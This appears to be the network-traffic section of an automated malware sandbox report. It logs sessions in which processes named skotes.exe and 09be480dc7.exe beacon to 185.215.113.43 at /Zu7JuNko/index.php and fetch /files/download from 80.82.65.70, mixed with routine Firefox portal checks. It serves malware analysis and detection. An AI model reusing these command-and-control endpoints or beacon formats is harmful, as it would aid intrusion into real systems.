                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                50192.168.2.450388185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:26.930366993 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014799001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:29.267911911 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                51192.168.2.45038980.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:31.175199032 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:32.469386101 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:32 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.450391185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:31.860456944 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:32.863085032 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                53192.168.2.450393185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:34.934643984 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:36.263406992 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                54192.168.2.45039480.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:35.645622015 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:36.906970024 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:36 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                55192.168.2.450397185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:38.141506910 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:39.493371964 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                56192.168.2.45039980.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:39.499299049 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                57192.168.2.450405185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:43.340800047 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:44.503101110 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                58192.168.2.45040834.107.221.8280
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:44.207946062 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:45.295125008 CET297INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 10:15:14 GMT
                                                                                                                                                                                                                                                Age: 9571
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                59192.168.2.45042434.107.221.8280
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:46.505781889 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:47.631535053 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80227
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.392896891 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.708425045 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80228
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.809890032 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:49.124859095 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80228
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:49.306224108 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:49.621206999 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80229
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:51.190773964 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:51.505752087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80231
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:55.820697069 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.135781050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80235
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:04.555594921 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:04.887392998 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80244
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:06.480324984 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:06.795113087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80246
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:12.458348989 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:12.773329020 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80252
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:13.955285072 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:14.270586014 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80254
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:16.430587053 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:16.745903015 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80256
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:26.825746059 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:28.234575033 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
